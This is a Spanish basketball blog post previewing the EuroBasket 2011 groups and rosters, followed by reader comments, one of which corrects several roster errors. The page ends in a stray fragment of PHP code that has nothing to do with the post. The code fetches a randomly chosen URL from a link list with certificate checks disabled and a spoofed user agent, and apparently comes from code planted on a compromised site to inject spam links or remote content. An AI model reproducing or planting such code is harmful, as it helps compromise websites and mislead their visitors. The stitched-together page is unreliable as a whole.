EuroNBAsket 2011: Empieza el baile

30 de August de 2011 por TheDeerHunter

¡Volvemos de vacaciones! Adelantamos algunos días nuestro regreso para inaugurar el curso baloncestístico, que da comienzo mañana en Lituania.

Con todas las dudas que nos atormentan sobre la temporada NBA, al menos tenemos por delante un Eurobasket  que algunos consideran el mejor de la historia, con la mayor representación de la mejor liga del mundo en los últimos años. Casi medio centenar de jugadores a los que seguiremos con atención. Esta edición viene marcada por el lockout que ha favorecido ese nivel en las selecciones participantes. Nos esperan más de 100 partidos en 19 días, con selecciones únicamente de 12 miembros. ¿Are you ready?

Grupo A:

Grupo duro el que debe afrontar el vigente campeón, aunque las 3 primeras plazas que dan derecho a la siguiente ronda parecen a priori adjudicadas.

España intentará defender el título con 6 NBAs y con ánimo de revancha. Pau Gasol intentará reivindicarse tras su decepcionante final de temporada en L.A. y la selección intentará hacer lo propio tras el fracaso en Turquía. A su lado tendrá, como no, a su hermano Marc y también como novedad al asimilado Serge Ibaka, dos de los hombres grandes revelación del pasado curso en USA. Juntos conforman un juego interior considerado por algunos como el más poderoso de la historia del país. Por fuera contarán con el “raptor” José Calderón más Rudy Fernández y Ricky Rubio, nuevas incorporaciones de Dallas Mavericks y Minnesota Timberwolves respectivamente. Son jugadores que, aunque nadie duda de sus cualidades, vienen atravesando un momento de juego irregular y de cuyo rendimiento dependerá buena parte de las posibilidades de liderar el grupo y de repetir título. La selección se completa con otros nombres importantes como son Juan Carlos Navarro (“ex-grizzlie), Sergi Llull (derechos de Rockets), Víctor Claver (derechos de Blazers), Felipe Reyes, Víctor Sada y Fernando San Emeterio. Son los claros favoritos para todo.

Dura piedra de toque para empezar con dos potentes selecciones como son Lituania y Turquía. Los lituanos tratarán de hacer valer su condición de anfitriones con un equipo muy compacto. Cuentan con tres NBA, el “sixer” Darius Songaila más dos nuevas perlas para la liga: Donatas Motiejunas (Rockets) y, sobre todo, Jonas Valanciunas (Raptors) al que algunos comparan con el mismísimo Sabonis. De momento el joven center ya se ha adueñado del campeonato del mundo sub-19 este verano. La escuadra la completan otros nombres importantes como el gran Jasikevicius, Kalnietis, Kaukenas, Jasaitis, Pocius, Petravicius, Javtokas y Kristof Lavrinovic. De momento ya saben lo que es derrotar a la selección Española hace bien poco en sus tierras. Por su parte, los turcos demostraron su potencial en el último mundobasket en el que terminaron subcampeones. Tienen en sus filas a nada menos que 4 NBAs aunque, como siempre, dependerán de la genialidad de Hedo Turkoglu, cada día más rara de ver. Cuentan con un juego interior temible con la nueva perla de los Jazz, Enes Kanter (según él mismo una mezcla de Pau Gasol, Dirk Nowitzki y… Cristiano Ronaldo, por lo menos), el “bull” Omer Asik y el “buck” Ilyasova. El jugador de los Celtics, Semih Erden, se ha quedado finalmente fuera por culpa de unas molestias en el hombro. Les acompañan otros nombres importantes como Onan, Tunceri o Ender Arslam. A buen seguro que venderán cara su piel.

No parecen suficientes Luol Deng y Ben Gordon para los ingleses y peor lo tiene Polonia al no haber podido incorporar a Marcin Gortat por problemas burocráticos. De Portugal mejor ni hablamos, venida de la repesca es la cenicienta del grupo. Las tres selecciones serán eliminadas sin mayor problema.

Grupo B:

El nombrado a priori “grupo de la muerte” al estar íntegramente formado por equipos con miembros NBA ha quedado un tanto desangelado debido a las ausencias del israelí Casspi, el francés Turiaf, el letón Biedrins… y que a Nenad Krstic se le ha acabado la paciencia en su aventura americana.

Serbia, por tradición y oficio, debería ser el equipo a batir dentro del grupo. Causa baja Velickovic, pero les queda un equipo repleto de talento. La columna vertebral formada por Teodosic, Markovic, Tepic, Savanovic, Krstic, Perovic, Macvan (derechos de los Cavs), Bjelica (derechos de los Wolves) y Keselj siempre bien dirigida por el genio Dusan Ivkovic sirve de garantías para aspirar a todo.

Llega fuerte también Francia, la selección con mayor representación NBA en la competición y posiblemente la mayor potencia física. Aún con la baja de última hora de Turiaf cuentan con Tony Parker, Rodrigue Beaubois, Nicolas Batum, Mickael Pietrus, Boris Diaw, Joakim Noah, Ian Mahinmi y Kevin Seraphin. Además de jovenes perlas como De Colo o Bokolo (habiendo perdido también por lesión a Diot) y viejos conocidos como Gelabale. Sólo el aspecto colectivo les ha privado hasta la fecha de aspirar a lo más alto.

Italia y Alemania, a priori, deberán pelear la clasificación para la siguiente ronda. Ambas cuentan con una artillería temible. Bargnani, Gallinari y Bellinelli por un lado y Nowitzi y Kaman por el otro. Las dudas llegan por la falta de experiencia en las grandes citas para los primeros y el estado físico/mental de “Robin Hood” tras una temporada tan intensa. Alemania no lo hizo mal sin él en el mundobasket y Nowitzki al 50% la puede liar parda. Por este motivo apostamos por ellos para ser terceros de grupo.

Israel y Letonia, sin sus figuras, serán con toda seguridad comparsas e intentarán evitar la última plaza. Atención especial para el letón Davis Bertans , recientemente drafteado por los Pacers y traspasado a los Spurs.

Grupo C:

Visto lo visto hasta ahora, el grupo C no despierta tantas pasiones.

Grecia parece tener el camino despejado hasta la primera posición del grupo. Su único representante NBA, Kosta Koufos, está rodeado por la vieja guardia helena. No se puede dar por muerto a una escuadra con Diamantidis, Spanoulis, Papaloukas, Schortsanitis, Zisis, Fotsis, Calathes… aunque quizás les falta algo de aire fresco para aspirar a medallas.

Croacia trae un interesante plantel encabezado por el nuevo “net” Bojan Bogdanovic. Siempre resulta interesante seguir las evoluciones de los Ante Tomic, Marko Tomas, Roko Ukic, Stanko Barac, Markota, Popovic… aunque sabemos que son capaces de lo mejor y de lo peor (mayormente).

Por su parte, Montenegro pondrá en cancha a nada menos que dos NBAs: Nikola Pekovic de los Wolves y Nikola Vucevic de los 76ers. Cuentan además con Omar Cook, viejo conocido por estos lares. Veremos si es suficiente para aguantar el empuje de Macedonia contra quienes ya resultaron derrotados en la preparación. Éstos a su vez también fueron derrotados por Bosnia-Herzegovina, con lo que la lucha por la tercera plaza parece absolutamente abierta entre estas tres modestas selecciones valcánicas.

Por último, Finlandia viene de la repesca con muchas papeletas de ser última del grupo. Su hombre más destacado es Petteri Koponen del que los Mavs tienen sus derechos.

Grupo D:

El grupo lo puede encabezar Rusia, que busca recuperar el excelso nivel de hace 4 años en Madrid. Para ello la lista presentada por David Blatt presenta varias caras conocidas. Kirilenko y Mozgov como representantes NBA, ayudados por Kryapa y Serge Monya. Además cuenta con hombres con talento como Vitaly Fridzon, Shved o Vorontsevich. Una selección muy física, con talento y experiencia, pero que es capaz también de lo mejor y de lo peor como así ha demostrado en la preparación, ganando a Lituania y perdiendo contra Israel.

Otro excelente equipo es Eslovenia, a pesar de los palizones que se llevó en nuestras tierras. Nachbar no será de la partida, pero con Goran Dragic más gente como Lorbek, Lakovic, Udrih, Slokar o Smodis tienen lo bastante para cuajar un buen papel. Preocupa un poco la falta de respuestas que han mostrado frente a juegos interiores potentes, como ya les pasó contra Georgia en la preparación, y tal factor podría hacer peligrar la clasificación.

En la pomada estarán también la Ukrania de Kyrylo Fesenko y Mike Fratello y la Georgia de Zaza Pachulia. Ojo al papel que pueden ofrecer alguno de estos dos equipos.

Finalmente Bulgaria y Bélgica (con Didier Mbenga, debido a la lesión de Axel Hervelle) se repartirán la últimas plazas.

Comenta

4 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Ey, que alegría volver a saber de vosotros. Me encantan vuestros post. Bueno, me jode que el primer post del curso baloncestístico sea para rectificaros algunas cosas. Pero a ver, en Lituania no va a jugar Montiejunas y sí lo hará Jankunas; en Francia no va Beaubois, Mahinmi, M. Pietrus y Bokolo (sí van Kahudi, F. Pietrus, Traoré y Tchicambaud), así que la mayor representación NBA creo que sería para España, no?; Grecia podría ser muy temible con Diamantidis, Spanoulis, Papaloukas, Schortsianitis, pero lamentablemente no irán estos cuatros (Sloukas, Bramos, Xhantopoulos y Kaimakoglou son las alternativas); en Croacia no va Roko Ukic (lo sustituye Dontaye Draper).

    Yo me mojo en el grupo de Grecia y Croacia a que se mete Montenegro seguro (y diría que puede meterse como segundo). Si hubiera otros rivales podrían echar a Grecia o Croacia, pero Macedonia, Bosnia y Finlandia no tienen nivel. Veo a Bosnia cuarta peleando el tercer puesto… pero no más.

    Y para mí, los 4 favoritos para el Eurobasket (los que van a pelearse las medallas):

    1. España
    2. Serbia
    3. Rusia
    4. Lituania

    Los cuartofinalistas:
    5. Alemania
    6. Francia
    7. Turquía
    8. Croacia

    Italia me mola, pero es un poco el caos. Van a tirones, hay cuartos que solo juegan a tirarse triples, otros en los que juegan a hacer desfiles de modelos hacia la canasta, a ver quien tiene mas cojones jugándose el 1×1… En otros cuartos se les olvida defender por completo… Es decir, por potencial podría luchar por medallas, pero es igual de caos que Croacia, Eslovenia y demás, aunque con mucha más calidad. Luego veo hostión de Grecia en la segunda fase, no tienen calidad para nada, nulos. Pasarán de primera fase porque es el grupo más fácil. También habrá que ver a Gran Bretaña, un equipo joven que dará guerra hasta segunda fase: Deng, Freeland, Archibald y Daniel Clark.

    Y en conclusión, esta primera semana será para ver mogoyón de partidos intrascendentes, casi como si fuera una primera ronda de Euroliga, ver quien es el escolta que se lo tira todo de Bulgaria, Letonia, Ucrania, y que aparece con más de 25 puntos por partido en primera fase; ver quien se mete el batacazo, alguna lesión importante… en fin, puro entretenimiento, casi como si siguieran los partidos de preparación.

    Y la segunda fase también va a ser un poco bacalá, porque serán dos grupos de 6 y pasan 4 de cada grupo. Es decir, veo un torneo de la hostia para los frikis del basket, pero muy engorroso de explicar, con mucha bacalá, y con mil oportunidades para equipos rezagados que hagán el granuja durante las dos primeras fases y acabarán pasando a cuartos con tres o cuatro victorias (puede ser el caso de Turquía, Croacia o Eslovenia, que les suele gustar jugar con fuego, y Turquía está haciendo una preparación bastante mediocre, aunque tienen pinta de que irán creciendo en el torneo, y además tienen equipazo).

    En fin, molará seguir el torneo por aquí. Esto empieza ya!!

      Citar

  2. TheDeerHunter dice:
    #2

    Que no te joda Sancho… al revés. Se agradece la corrección.
    Sobre las fuentes consultadas (www.eurobasket2011.com) tenía entendido que esas eran las listas definitivas, aunque la información está bastante dispersa y poco clara. Tampoco tenía demasiado tiempo para contrastarlas y sabía que corría un gran riesgo de meter el remo, como así ha sucedido.

    Desde siempre en TJNBA los visitantes son tan importantes como los “internos” (de hecho yo llegué como visitante)

    Lástima entonces para Francia y para Grecia. Con este panorama… ¿sigue siendo el mejor Eurobasket de la historia?

      Citar

  3. safd dice:
    #3

    😀 A partir de mañana, a abrir tjnba nada más entrar, como siempre

      Citar

  4. Txusma dice:
    #4

    Vaya primer partido de España. Si no es por Pau principalmente palmamos contra una Polonia sin Gortat. Si hubiera estado él, cuidadín que los hermanos Gasol no hubieran campados tan a sus anchas como lo han hecho. Fatal la defensa y horribles Calderon, Ricky y Llull.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>